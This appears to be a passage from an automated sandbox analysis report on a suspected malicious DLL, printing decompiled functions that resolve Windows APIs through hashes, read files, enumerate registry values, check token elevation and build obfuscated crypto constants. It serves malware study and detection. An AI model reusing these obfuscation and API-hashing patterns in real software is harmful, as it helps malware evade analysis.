0x6e9f5c67
0x6e9f5c6a
0x6e9f5c6a
0x6e9f5bc1
0x6e9f5bc1
0x6e9f5bc8
0x6e9f5bc8
0x6e9f5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E9F5C16

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction ID: e85de59359bc1cf478ae250814f9bfb00fea9cc4b58399d0bbb3069879fe4c2d
Opcode Fuzzy Hash: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction Fuzzy Hash: 1F01046039420AFFF79056E18C85F67764DDF9224DF008825BA229A181DA26DD5A8B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E9F5BA9(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9EC2B0(_t24);
				if(E6E9EC2C4(_t24) != 0) {
					_t34[2] = E6E9F35C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E9F303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E9F3670(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e9f5ba9
0x6e9f5bb0
0x6e9f5bb3
0x6e9f5be1
0x6e9f5bea
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x6e9f5c9e
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c4a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
0x6e9f5c67
0x6e9f5c6a
0x6e9f5c6a
0x6e9f5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E9F5C16

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction ID: 547a0036906cf524804b50778cf063ccd2bc6272f6fe7fb55802d4c427b11b3f
Opcode Fuzzy Hash: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction Fuzzy Hash: D101456038020AFFF35056E14C41FBB368DDFD224DF008826FA22991C5DE2ACC4A8B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E9F5B8B(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9EC2B0(_t23);
				if(E6E9EC2C4(_t23) != 0) {
					_t31[2] = E6E9F35C8(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E9F303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E9F3670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e9f5b8b
0x6e9f5b92
0x6e9f5be1
0x6e9f5bea
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x6e9f5c9e
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c4a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
0x6e9f5c67
0x6e9f5c6a
0x6e9f5c6a
0x6e9f5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E9F5C16

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction ID: e69e2fef5ac3ae7e02155697a4a35c103cbe49186f0f3d1276469f5141b22755
Opcode Fuzzy Hash: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction Fuzzy Hash: 5701246139020AFBF79056E18C41FBB364CDF9224DF008825BA6299181DE26DD568B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E9F5BD9(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9EC2B0(_t23);
				if(E6E9EC2C4(_t23) != 0) {
					_t31[2] = E6E9F35C8(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E9F303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E9F3670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e9f5bd9
0x6e9f5bdd
0x6e9f5be1
0x6e9f5bea
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x6e9f5c9e
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c4a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
0x6e9f5c67
0x6e9f5c6a
0x6e9f5c6a
0x6e9f5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E9F5C16

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction ID: 3682d04a6b681e5f02bd70cf17401b2f71f4257b0ac75676aedc709d9b41b69e
Opcode Fuzzy Hash: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction Fuzzy Hash: EB01476139020AFBF35056E14C41FBB774CDF9224CF008825BA2299181DE26CD568A61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E9F5DE8(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E9EC2C4(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E9F303C(0x10154545, 0x95343033) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e9f5dec
0x6e9f5ded
0x6e9f5def
0x6e9f5df5
0x6e9f5df7
0x6e9f5dfb
0x6e9f5dfb
0x6e9f5dff
0x6e9f5e0b
0x6e9f5e3f
0x6e9f5e3f
0x00000000
0x6e9f5e0d
0x6e9f5e12
0x6e9f5e13
0x6e9f5e27
0x6e9f5e38
0x6e9f5e29
0x6e9f5e34
0x6e9f5e34
0x6e9f5e3d
0x6e9f5e45
0x6e9f5e47
0x6e9f5e4a
0x6e9f5e4f
0x6e9f5e4f
0x6e9f5e53
0x6e9f5e58
0x00000000
0x00000000
0x00000000
0x6e9f5e3d

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,95343033,?,?,00000000,00000000,?,6E9F5D20,?,?), ref: 6E9F5E34

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction ID: 517b7d4e7e731bda3a70215290f7af40d03d3df64962faf3c66a9e74ecb0a59a
Opcode Fuzzy Hash: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction Fuzzy Hash: 4AF0F932A19711BAD7515DB89C50B9767D8DFE5710F108F29E550E6140EB71CC824B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9F5624(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E9F303C(0x8b9d0da7, 0x73b21bac) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E9EE670(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e9f562e
0x6e9f5630
0x6e9f5637
0x6e9f5639
0x6e9f563d
0x6e9f563f
0x6e9f5642
0x6e9f5645
0x6e9f5645
0x6e9f565f
0x00000000
0x00000000
0x6e9f5670
0x6e9f5674
0x00000000
0x00000000
0x6e9f5682
0x6e9f5685
0x6e9f568a
0x6e9f568f
0x6e9f568f

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,8B9D0DA7,73B21BAC,?,?,8B9D0DA7,73B21BAC), ref: 6E9F5670

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction ID: b69a45415939a7ff5389b17e7b35c811c2a8535098c403d4d34a1efb47819dde
Opcode Fuzzy Hash: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction Fuzzy Hash: 38F0AFB5204309BEE7609E5ACC54DB7BBEDEFD1B58F00892EA4E542200DA31EC118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9F5E5C(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E9EC2C4(_t19) == 0) {
					_v12 = _a8;
					if(E6E9F303C(0x10154545, 0x73afd997) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E9F35C8(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e9f5e5f
0x6e9f5e61
0x6e9f5e6d
0x6e9f5e77
0x6e9f5e8d
0x6e9f5eac
0x6e9f5e8f
0x6e9f5ea0
0x6e9f5ea4
0x6e9f5ec4
0x6e9f5ea6
0x6e9f5ea6
0x6e9f5ea6
0x6e9f5ea4
0x6e9f5ead
0x6e9f5eb2
0x6e9f5ebb
0x6e9f5eb4
0x6e9f5eb4
0x6e9f5eb6
0x6e9f5eb6
0x6e9f5e6f
0x6e9f5e6f
0x6e9f5e6f
0x6e9f5ec1

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,10154545,73AFD997,?,?,?,6E9F5D51,00000000,?,00000000,?), ref: 6E9F5EA0

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction ID: 2916f7a649ea77a95ab06f05a3e046a5688103d01c855b324c6a456732334249
Opcode Fuzzy Hash: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction Fuzzy Hash: 89F08631248207FED751AAB98C20AA677D8AF95254F008C2AA9A5C6250EB31DC068F11

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F1054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E9F1054(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E9F3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x8b9d0da3
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e9f1062
0x6e9f1064
0x6e9f1072
0x6e9f1076
0x6e9f10bf
0x00000000
0x6e9f10bf
0x6e9f107b
0x6e9f107c
0x6e9f107e
0x6e9f1083
0x00000000
0x6e9f109c
0x6e9f10a0
0x6e9f10ad
0x6e9f10b1
0x00000000
0x00000000
0x00000000
0x6e9f10ba

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,8B9D0DA3,00000004,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E9F10AD

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction ID: 1d001b779d21b865218e6af2245d0f3891a2db6c00b35a5cf04d5063da8828a5
Opcode Fuzzy Hash: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction Fuzzy Hash: 8EF0A4F0244343EBEA44D5B98C14F3B61DE6FC1604F04C828B540CB195EA78C98A8B62

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F3600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E9F3600(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e9fd228 == 0x8c456a83) {
					_t7 = E6E9F303C(0xfe338407, 0x82fffbdc);
					 *0x6e9fd22c = E6E9F303C(0xfe338407, 0xc09bf2f8);
					if( *0x6e9fd228 == 0x8c456a83) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e9fd228 = 0;
					}
				}
				_t3 = E6E9F303C(0xfe338407, 0xdb278333);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e9fd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e9f3608
0x6e9f3610
0x6e9f3643
0x6e9f3654
0x6e9f365f
0x6e9f366a
0x6e9f366c
0x6e9f366c
0x6e9f365f
0x6e9f361c
0x6e9f3623
0x00000000
0x6e9f3625
0x6e9f3625
0x6e9f3626
0x6e9f3628
0x6e9f362a
0x6e9f362b
0x00000000
0x6e9f362b

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,FE338407,C09BF2F8,FE338407,82FFFBDC,?,?,00000000,6E9EDE41,?,?), ref: 6E9F366A

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3f295d94fd738a13157f70006e13a6f7ecf99b69bc7ed5f22f087a4de0995f87
Instruction ID: a4d60102c43a306fc0091b95eb96d8ad9ecdc66d1795d1f6e9726e3b6634f287
Opcode Fuzzy Hash: 3f295d94fd738a13157f70006e13a6f7ecf99b69bc7ed5f22f087a4de0995f87
Instruction Fuzzy Hash: EFF027A5144181FDE610AAF6AD0DEDBF59CDF96355B300C2AB580E3780D929C4438F27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9E1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E9E1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E9EF5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v76, E6E9EF4F0( &_v76) + 0x10);
				E6E9EF4E0( &_v80, E6E9EF4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v84, E6E9EF4F0(_t325) + 0x10);
				E6E9EF4E0( &_v88, E6E9EF4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v92, E6E9EF4F0(_t329) + 0x10);
				E6E9EF4E0( &_v96, E6E9EF4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v100, E6E9EF4F0(_t333) + 0x10);
				E6E9EF4E0( &_v104, E6E9EF4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v108, E6E9EF4F0(_t337) + 0x10);
				E6E9EF4E0( &_v112, E6E9EF4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v116, E6E9EF4F0(_t341) + 0x10);
				E6E9EF4E0( &_v120, E6E9EF4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v124, E6E9EF4F0(_t345) + 0x10);
				E6E9EF4E0( &_v128, E6E9EF4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E6E9EF84C( &_v132, E6E9EF4F0(_t349) + 0x10);
				E6E9EF4E0( &_v136, E6E9EF4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
